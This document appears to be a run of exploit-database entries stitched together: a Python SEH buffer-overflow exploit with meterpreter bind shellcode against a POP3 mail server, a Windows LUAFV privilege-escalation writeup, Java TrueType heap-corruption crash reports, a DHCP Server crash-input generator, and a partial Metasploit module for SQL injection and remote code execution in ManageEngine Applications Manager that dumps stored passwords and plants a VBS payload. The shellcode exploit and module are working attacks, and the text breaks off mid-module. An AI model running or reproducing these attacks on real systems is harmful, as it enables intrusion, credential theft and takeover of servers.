# Created for the Telspace Internship 2019 - SEH Exploit
# POC
# 1.) Change ip, username, password and port in code
# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
#N.B For all Mail Carrier exploits, increase/decrease the initial EIP overwrite buffer if your target ip is larger/smaller in digits.
#Crash at 6174
import sys
import socket
import time
#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
# Encoded payload bytes; the comment on the preceding line records the
# msfvenom invocation that produced them (alpha_mixed encoder, bad chars
# "\x00\xd5\x0a\x0d\x1a\x03"). Total length is 680 bytes, which is what the
# buffer arithmetic below (6882 - 6174 - 8 - 20) relies on.
shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f"
"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50"
"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63"
"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f"
"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69"
"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72"
"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e"
"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61"
"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33"
"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b"
"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46"
"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53"
"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70"
"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b"
"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c"
"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64"
"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59"
"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b"
"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33"
"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c"
"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33"
"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38"
"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74"
"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a"
"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48"
"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69"
"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59"
"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45"
"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b"
"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71"
"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52"
"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44"
"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79"
"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b"
"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75"
"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43"
"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66"
"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f"
"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67"
"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b"
"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69"
"\x6f\x78\x55\x41\x41")
# Buffer layout, in order: 6174 filler bytes (the "Crash at 6174" offset noted
# in the header), a 4-byte nSEH value, the 4-byte SEH address 0x1b0d110c
# written little-endian (the msjet40.dll gadget listed in the header), 20
# NOPs, the shellcode, then padding so the total is exactly 10000 bytes
# (6174 + 4 + 4 + 20 + 680 = 6882).
buffer = "A" * 6174 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (10000-6882)
# Python 2 print statements throughout (see the python shebang above).
print "[*] Mail Server 2.51 POP3 Buffer Overflow in RETR command\r\n"
print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
# Target host/port and the USER/PASS values are hard-coded; the header says to
# edit them before use. The socket is closed only on the normal path below.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.0.150", 110))
print s.recv(1024)
print "[*] Sending USERNAME\r\n"
s.send('USER test' + '\r\n')
print s.recv(1024)
print "[*] Sending PASSWORD\r\n"
s.send('PASS test' + '\r\n')
print s.recv(1024)
# The oversized argument goes in the POP3 RETR command; no response is read.
s.send('RETR ' + buffer + '\r\n')
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, check for meterpreter shell on target ip port 443!"
Windows: LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition EoP
Platform: Windows 10 1809 (not tested earlier)
Class: Elevation of Privilege
Security Boundary (per Windows Security Service Criteria): User boundary
Summary:
The LUAFV driver has a race condition in the LuafvPostReadWrite callback if delay virtualization has occurred during a read leading to the SECTION_OBJECT_POINTERS value being reset to the underlying file resulting in EoP.
Description:
NOTE: While it has a similar effect as issue 49960 I believe it is a different root cause which might still be exploitable after any fixes. This bug is actually worse than 49960 as you can modify the original file rather than just the cached data and you can do it to any file which can be virtualized as you don’t need to have a file which has a NULL CONTROL_AREA pointer.
When a IRP_MJ_READ request is issued to a delay virtualized file the filter driver first calls LuafvPreRedirectWithCallback which determines if the file is virtualized, it then sets the underlying, read-only file as the target file object for the filter processing as well as storing the file object in the completion context. When the read operation completes the LuafvPostReadWrite method is called which will inspect the completion context and copy out the file position and the SECTION_OBJECT_POINTERS value.
As there’s no locking in place at this point if the file delay virtualization is completed between the call to LuafvPreRedirectWithCallback and LuafvPostReadWrite then the SECTION_OBJECT_POINTERS and cache from the read-only file is used to overwrite the top-level “fake” file object, even though LuafvPerformDelayedVirtualization would have changed them to the new read-write virtual store file. By exploiting this race it’s possible to map the “real” file read-write which allows you to modify the data (you can probably also just write to the underlying file as well).
The trick to exploiting this bug is winning the race. One behavior that makes it an easy race to win is the delayed virtualization process passes on almost all CreateOptions flags to the underlying file create calls. By passing the FILE_COMPLETE_IF_OPLOCKED flag you can bypass waiting for an oplock break on IRP_MJ_CREATE and instead get it to occur on IRP_MJ_READ. The following is a rough overview of the process:
1) Open a file which will be delay virtualized and oplock with READ/HANDLE lease.
2) Open the file again for read/write access which will be delay virtualized. Pass the FILE_COMPLETE_IF_OPLOCKED flag to the create operation. The create operation will return STATUS_OPLOCK_BREAK_IN_PROGRESS but that’s a success code so the delayed virtualization setup is successful.
3) Create a new dummy file in the virtual store to prevent the driver copying the original data (which will likely wait for an oplock break).
4) Issue a read request on the virtualized file object, at this point the IRP_MJ_READ will be dispatched to “real” file and will get stuck waiting for an oplock break inside the NTFS driver.
5) While the read request is in progress issue a IRP_MJ_SET_EA request, this operation is ignored for oplock breaks so will complete, however the LUAFV driver will call LuafvPreWrite to complete the delayed virtualization process.
6) Acknowledge the oplock break by closing the file opened in step 1.
7) Wait for read operation to complete.
8) Map the file as a read/write section. The data should be the “real” file contents not the dummy virtual store contents. Modifying the file will now cause the “real” file to be modified.
Note that even if you filtered the CreateOptions (as you should IMO) the race still exists, it would just be harder to exploit. Fixing wise, you probably want to check the virtualized object context and determine that the delay virtualization has already occurred before overwriting anything in the top-level file object.
These operations can’t be done from any sandbox that I know of so it’s only a user to system privilege escalation.
Proof of Concept:
I’ve provided a PoC as a C# project. It will map the license.rtf file as read-write, although it won’t try and modify the data. However if you write to the mapped section it will change the original file.
1) Compile the C# project. It’ll need to pull NtApiDotNet from NuGet to build.
2) As a normal user run the PoC.
3) The PoC should print the first 16 characters of the mapped file.
Expected Result:
The mapped data should be all ‘A’ characters.
Observed Result:
The mapped data is the actual license.rtf file and it’s mapped writable.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46718.zip
A heap corruption was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType fonts. It manifests itself in the form of the following (or similar) crash:
--- cut ---
$ bin/java -cp . DisplaySfntFont test.ttf
Iteration (0,0)
#
# A fatal error has been detected by the Java Runtime Environment:
#
# SIGSEGV (0xb) at pc=0x00007f7285b39824, pid=234398, tid=0x00007f7286683700
#
# JRE version: Java(TM) SE Runtime Environment (8.0_202-b08) (build 1.8.0_202-b08)
# Java VM: Java HotSpot(TM) 64-Bit Server VM (25.202-b08 mixed mode linux-amd64 compressed oops)
# Problematic frame:
# C [libc.so.6+0x77824]# [ timer expired, abort... ]
Aborted
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Linux, it can be also triggered with the MALLOC_CHECK_=3 environment variable:
--- cut ---
$ MALLOC_CHECK_=3 bin/java -cp . DisplaySfntFont test.ttf
Iteration (0,0)
*** Error in `bin/java': free(): invalid pointer: 0x0000000002876320 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f84185edbcb]
/lib/x86_64-linux-gnu/libc.so.6(+0x76f96)[0x7f84185f3f96]
jre/8u202/lib/amd64/libfontmanager.so(+0x1d2b2)[0x7f83ddc672b2]
jre/8u202/lib/amd64/libfontmanager.so(+0x27ff4)[0x7f83ddc71ff4]
jre/8u202/lib/amd64/libfontmanager.so(+0x866f)[0x7f83ddc5266f]
jre/8u202/lib/amd64/libfontmanager.so(Java_sun_font_SunLayoutEngine_nativeLayout+0x230)[0x7f83ddc78990]
[0x7f84076306c7]
======= Memory map: ========
00400000-00401000 r-xp 00000000 fe:01 20840680 jre/8u202/bin/java
00600000-00601000 r--p 00000000 fe:01 20840680 jre/8u202/bin/java
00601000-00602000 rw-p 00001000 fe:01 20840680 jre/8u202/bin/java
023ba000-028d9000 rw-p 00000000 00:00 0 [heap]
3d1a00000-3fba00000 rw-p 00000000 00:00 0
3fba00000-670900000 ---p 00000000 00:00 0
670900000-685900000 rw-p 00000000 00:00 0
685900000-7c0000000 ---p 00000000 00:00 0
7c0000000-7c00c0000 rw-p 00000000 00:00 0
7c00c0000-800000000 ---p 00000000 00:00 0
[...]
--- cut ---
... under Valgrind:
--- cut ---
$ valgrind bin/java -cp . DisplaySfntFont test.ttf
[...]
==245623== Invalid write of size 2
==245623== at 0x40BF2750: GlyphIterator::setCurrGlyphID(unsigned short) (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40C0C089: SingleSubstitutionFormat1Subtable::process(LEReferenceTo<SingleSubstitutionFormat1Subtable> const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40C0C4A4: SingleSubstitutionSubtable::process(LEReferenceTo<SingleSubstitutionSubtable> const&, GlyphIterator*, LEErrorCode&, LEGlyphFilter const*) const (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40BF47E5: GlyphSubstitutionLookupProcessor::applySubtable(LEReferenceTo<LookupSubtable> const&, unsigned short, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const [clone .part.11] (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40C01DCE: LookupProcessor::applyLookupTable(LEReferenceTo<LookupTable> const&, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40C02FBA: LookupProcessor::applySingleLookup(unsigned short, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40BEBC9C: ContextualSubstitutionBase::applySubstitutionLookups(LookupProcessor const*, LEReferenceToArrayOf<SubstitutionLookupRecord> const&, unsigned short, GlyphIterator*, LEFontInstance const*, int, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40BEE766: ChainingContextualSubstitutionFormat3Subtable::process(LETableReference const&, LookupProcessor const*, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40BEE8E3: ChainingContextualSubstitutionSubtable::process(LEReferenceTo<ChainingContextualSubstitutionSubtable> const&, LookupProcessor const*, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40BF475B: GlyphSubstitutionLookupProcessor::applySubtable(LEReferenceTo<LookupSubtable> const&, unsigned short, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const [clone .part.11] (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40C01DCE: LookupProcessor::applyLookupTable(LEReferenceTo<LookupTable> const&, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40C02EAB: LookupProcessor::process(LEGlyphStorage&, GlyphPositionAdjustments*, char, LEReferenceTo<GlyphDefinitionTableHeader> const&, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== Address 0x3f68a55c is 4 bytes before a block of size 104 alloc'd
==245623== at 0x4C2BBEF: malloc (vg_replace_malloc.c:299)
==245623== by 0x40BFD4CF: LEGlyphStorage::allocateGlyphArray(int, char, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40BE875A: ArabicOpenTypeLayoutEngine::characterProcessing(unsigned short const*, int, int, int, char, unsigned short*&, LEGlyphStorage&, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40C0815F: OpenTypeLayoutEngine::computeGlyphs(unsigned short const*, int, int, int, char, LEGlyphStorage&, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40BFE55D: LayoutEngine::layoutChars(unsigned short const*, int, int, int, char, float, float, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40C0E91F: Java_sun_font_SunLayoutEngine_nativeLayout (in jre/8u202/lib/amd64/libfontmanager.so)
[...]
--- cut ---
or with AFL's libdislocator under gdb:
--- cut ---
Continuing.
Iteration (0,0)
*** [AFL] bad allocator canary on free() ***
Thread 2 "java" received signal SIGABRT, Aborted.
[...]
Stopped reason: SIGABRT
__GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51
51 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
gdb$ where
#0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51
#1 0x00007ffff72313fa in __GI_abort () at abort.c:89
#2 0x00007ffff7bd651c in free () from libdislocator/libdislocator.so
#3 0x00007fffb892f2b2 in LEGlyphStorage::reset() () from jre/8u202/lib/amd64/libfontmanager.so
#4 0x00007fffb8939ff4 in OpenTypeLayoutEngine::~OpenTypeLayoutEngine() ()
from jre/8u202/lib/amd64/libfontmanager.so
#5 0x00007fffb891a66f in ArabicOpenTypeLayoutEngine::~ArabicOpenTypeLayoutEngine() ()
from jre/8u202/lib/amd64/libfontmanager.so
#6 0x00007fffb8940990 in Java_sun_font_SunLayoutEngine_nativeLayout ()
from jre/8u202/lib/amd64/libfontmanager.so
#7 0x00007fffe5e376c7 in ?? ()
#8 0x0000000000000000 in ?? ()
--- cut ---
On Windows, the crash also reliably reproduces with PageHeap enabled for the java.exe process:
--- cut ---
(1184.4c60): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
fontmanager!Java_sun_java2d_loops_DrawGlyphListLCD_DrawGlyphListLCD+0x14bf:
00007ffa`0d6291bf 428124810000ffff and dword ptr [rcx+r8*4],0FFFF0000h ds:00000000`39663ffc=????????
--- cut ---
We have encountered crashes in the libfontmanager!GlyphIterator::setCurrGlyphID function while trying to write before and after a heap allocation. Attached with this report are two mutated testcases (for the buffer under- and overflow), and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46723.zip
A heap corruption was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType, implemented in a proprietary t2k library. It manifests itself in the form of the following (or similar) crash:
--- cut ---
$ bin/java -cp . DisplaySfntFont test.ttf
Iteration (0,0)
*** Error in `bin/java': munmap_chunk(): invalid pointer: 0x00007f5cf82a6490 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f5cfd492bcb]
/lib/x86_64-linux-gnu/libc.so.6(+0x76f96)[0x7f5cfd498f96]
jre/8u202/lib/amd64/libt2k.so(+0x5443d)[0x7f5cd563343d]
jre/8u202/lib/amd64/libt2k.so(+0x47b95)[0x7f5cd5626b95]
jre/8u202/lib/amd64/libt2k.so(Java_sun_font_T2KFontScaler_getGlyphImageNative+0xe5)[0x7f5cd560fa25]
[0x7f5ce83a06c7]
======= Memory map: ========
00400000-00401000 r-xp 00000000 fe:01 20840680 jre/8u202/bin/java
00600000-00601000 r--p 00000000 fe:01 20840680 jre/8u202/bin/java
00601000-00602000 rw-p 00001000 fe:01 20840680 jre/8u202/bin/java
02573000-02594000 rw-p 00000000 00:00 0 [heap]
3d1a00000-3fba00000 rw-p 00000000 00:00 0
3fba00000-670900000 ---p 00000000 00:00 0
670900000-685900000 rw-p 00000000 00:00 0
685900000-7c0000000 ---p 00000000 00:00 0
7c0000000-7c00c0000 rw-p 00000000 00:00 0
7c00c0000-800000000 ---p 00000000 00:00 0
[...]
Aborted
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Linux, it can also be triggered under Valgrind (many out-of-bounds reads and writes in sc_FindExtrema4 were omitted in the log below):
--- cut ---
$ valgrind bin/java -cp . DisplaySfntFont test.ttf
[...]
==211051== Invalid write of size 8
==211051== at 0x415B30EE: sc_FindExtrema4 (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x4159A402: fs_FindBitMapSize4 (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x415D3247: MakeBWBits (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x415CAE44: T2K_RenderGlyphInternal (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x415CB3CA: T2K_RenderGlyph (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x415B4A24: Java_sun_font_T2KFontScaler_getGlyphImageNative (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x7B8D6C6: ???
==211051== by 0x7B7CDCF: ???
==211051== by 0x7B7CDCF: ???
==211051== by 0x7B7CDCF: ???
==211051== by 0x7B7D2BC: ???
==211051== by 0x7B7CA8F: ???
==211051== Address 0x3f6f1d38 is 19,160 bytes inside a block of size 19,166 alloc'd
==211051== at 0x4C2BBEF: malloc (vg_replace_malloc.c:299)
==211051== by 0x415D84A4: tsi_AllocMem (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x415B2664: sc_FindExtrema4 (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x4159A402: fs_FindBitMapSize4 (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x415D3247: MakeBWBits (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x415CAE44: T2K_RenderGlyphInternal (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x415CB3CA: T2K_RenderGlyph (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x415B4A24: Java_sun_font_T2KFontScaler_getGlyphImageNative (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x7B8D6C6: ???
==211051== by 0x7B7CDCF: ???
==211051== by 0x7B7CDCF: ???
==211051== by 0x7B7CDCF: ???
[...]
--- cut ---
or with AFL's libdislocator under gdb:
--- cut ---
Thread 2 "java" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
[...]
R11: 0x7fffb5d89e82 --> 0x0
[...]
EFLAGS: 0x10293 (CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7fffb63be972 <sc_FindExtrema4+914>: lea r11,[r12+r9*2]
0x7fffb63be976 <sc_FindExtrema4+918>: je 0x7fffb63bea30 <sc_FindExtrema4+1104>
0x7fffb63be97c <sc_FindExtrema4+924>: lea r9d,[r8-0x1]
=> 0x7fffb63be980 <sc_FindExtrema4+928>: add WORD PTR [r11],0x1
0x7fffb63be985 <sc_FindExtrema4+933>: test r9d,r9d
0x7fffb63be988 <sc_FindExtrema4+936>: je 0x7fffb63bea30 <sc_FindExtrema4+1104>
0x7fffb63be98e <sc_FindExtrema4+942>: add WORD PTR [r11+0x2],0x1
0x7fffb63be994 <sc_FindExtrema4+948>: cmp r8d,0x2
[...]
--- cut ---
On Windows, the crash also reliably reproduces with PageHeap enabled for the java.exe process:
--- cut ---
(244c.1660): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Java\jre1.8.0_202\bin\server\jvm.dll -
jvm+0x8598:
00000000`61158598 c7040801000000 mov dword ptr [rax+rcx],1 ds:00000000`05860280=00000001
--- cut ---
In total, we have encountered crashes in the t2k!sc_FindExtrema4 function in three different locations, in two cases while adding 1 to an invalid memory location, and in one case while adding 2 to an out-of-bounds address. Attached with this report are three mutated testcases (one for each crashing code location), and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46722.zip
#Exploit Title: DHCP Server 2.5.2 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-04-16
#Vendor Homepage: http://www.dhcpserver.de/cms/
#Software Link: http://www.dhcpserver.de/cms/wp-content/plugins/download-attachments
#Tested Version: 2.5.2
#Tested on: Windows 7 x32 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: DHCPSRV_2.5.2.py
#2.- Open dhcp.txt and copy content to clipboard
#2.- Open dhcpwiz.exe
#3.- Click Next
#4.- In Network Interface cards Select "Local Area Connection" and click on Next
#5.- In Supported Protocols click on Next
#6.- In Configuring DHCP for Interface Select "DHCP Options"
#7.- Select "Bootfile" field and Paste ClipBoard
#8.- Crashed
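# Constructed crash input: 6000 'A' bytes (0x41), to be pasted into the
# "Bootfile" field as described in the steps above.
cod = "\x41" * 6000

# The context manager closes the handle even if write() raises; the original
# open()/close() pair leaked the descriptor on any error between the two.
with open('dhcp.txt', 'w') as f:
    f.write(cod)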
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
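class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name' => "ManageEngine Applications Manager 11.0 < 14.0 SQL Injection / Remote Code Execution",
      'Description' => %q(
        This module exploits sql and command injection vulnerability in the ManageEngine AM 14 and prior versions.
        An unauthenticated user can gain the authority of "system" on the server due to SQL injection vulnerability.
        Exploit allows the writing of the desired file to the system using the postgesql structure.
        Module is written over the payload by selecting a file with the extension ".vbs" that is used for monitoring
        by the ManageEngine which working with "system" authority.
        In addition, it dumps the users and passwords from the database for us.
        Keep in mind! After the harmful ".vbs" file is written, the shell session may be a bit late.
        Because the ManageEngine application should run this file itself.
      ),
      'License' => MSF_LICENSE,
      'Author' => [
        'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
      ],
      'References' => [
        ['URL', 'https://pentest.com.tr/exploits/ManageEngine-App-Manager-14-SQLi-Remote-Code-Execution.html']
      ],
      'DefaultOptions' => {
        'WfsDelay' => 500,
        'PAYLOAD' => 'windows/shell_reverse_tcp',
        'RPORT' => 8443,
        'SSL' => true
      },
      'Payload' => {
        'Encoder' => 'x86/shikata_ga_nai'
      },
      'Platform' => ['win'],
      'Arch' => [ARCH_X86, ARCH_X64],
      'Targets' => [
        ['AppManager 14', {}],
        ['AppManager 13', {}],
        ['AppManager 12', {}],
        ['AppManager 11', {}]
      ],
      'Privileged' => true,
      'DisclosureDate' => 'Apr 17 2019',
      'DefaultTarget' => 1))
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the application', '/'])
      ]
    )
  end

  ##
  # Check exploit vulnerability basically // 'Appears' more convenient
  #
  # Sends a harmless one-character value through the injection point and
  # reports Appears when the response looks accepted (see #injected?).
  ##
  def check
    res = inject(Rex::Text.rand_text_alpha(1))
    return Exploit::CheckCode::Appears if injected?(res)

    Exploit::CheckCode::Safe
  end

  ##
  # VBS payload and Post Data preparation
  #
  # 1. dumps AM_UserPasswordTable to a random .txt under the target's working
  #    directory and fetches it over HTTP;
  # 2. wraps the generated EXE (as base64) in a one-line wmiget.vbs and writes
  #    it over the monitoring script through the same SQL injection.
  #
  # Returns the raw payload EXE bytes.
  ##
  def get_payload
    # Start the handler first: the .vbs is only run later by the application
    # itself, so the session may arrive well after this method returns.
    handler
    exe = generate_payload_exe
    @vbs_content = Msf::Util::EXE.to_exe_vbs(exe)

    ## determining the target directory: 'AppManager 14' -> 'AppManager14'
    tfile = target.name.delete(' ')

    fhashes = Rex::Text.rand_text_alpha_lower(8) + ".txt"
    ## parameters required to read the user table
    hashes = "sid=1;copy+(select+username,password+from+AM_UserPasswordTable)+to+$$"
    hashes << "c:\\Program+Files+(x86)\\ManageEngine\\"
    hashes << tfile
    hashes << "\\working\\"
    hashes << fhashes
    hashes << "$$;--"
    res = inject(hashes)
    unless injected?(res)
      fail_with(Failure::Unreachable, 'Connection error occurred!')
    end
    print_good("Users in the database were taken...")

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, fhashes) # users file url
    })
    # Response#code is an Integer; the original compared it with the String
    # "404", which never matched, so a missing dump was never reported.
    if res.nil? || res.code == 404
      fail_with(Failure::Unreachable, 'The database could not be read!')
    end
    print_status("--------------------Usernames and Passwords---------------------")
    print_line(res.body) # users table output, through the module's own output channel rather than stdout
    print_status("----------------------------------------------------------------")

    ## fetch base64 part in vbs payload: third `= "` segment before the first `"\nDim` line
    pb64 = @vbs_content.split("\"\nDim")[0].split(' = "')[2]

    ## vbs file in one line
    vbs_file = 'On Error Resume Next:Set objWbemLocator = CreateObject("WbemScripting.SWbemLocator"):'
    vbs_file << 'if Err.Number Then:WScript.Echo vbCrLf & "Error # " & " " & Err.Description:End If:O'
    vbs_file << 'n Error GoTo 0:On Error Resume Next:Select Case WScript.Arguments.Count:Case 2:strCo'
    vbs_file << 'mputer = Wscript.Arguments(0):strQuery = Wscript.Arguments(1):Set wbemServices = obj'
    vbs_file << 'WbemLocator.ConnectServer (strComputer,"Root\\CIMV2"):Case 4:strComputer = Wscript.A'
    vbs_file << 'rguments(0):strUsername = Wscript.Arguments(1):strPassword = Wscript.Arguments(2):st'
    vbs_file << 'rQuery = Wscript.Arguments(3):Set wbemServices = objWbemLocator.ConnectServer (strCo'
    vbs_file << 'mputer,"Root\\CIMV2",strUsername,strPassword):case 6:strComputer = Wscript.Arguments'
    vbs_file << '(0):strUsername = Wscript.Arguments(1):strPassword = Wscript.Arguments(2):strQuery ='
    vbs_file << ' Wscript.Arguments(4):namespace = Wscript.Arguments(5):Set wbemServices = objWbemLoca'
    vbs_file << 'tor.ConnectServer (strComputer,namespace,strUsername,strPassword):Case Else:strMsg ='
    vbs_file << ' "Error # in parameters passed":WScript.Echo strMsg:WScript.Quit(0):End Select:Set w'
    vbs_file << 'bemServices = objWbemLocator.ConnectServer (strComputer, namespace, strUsername, str'
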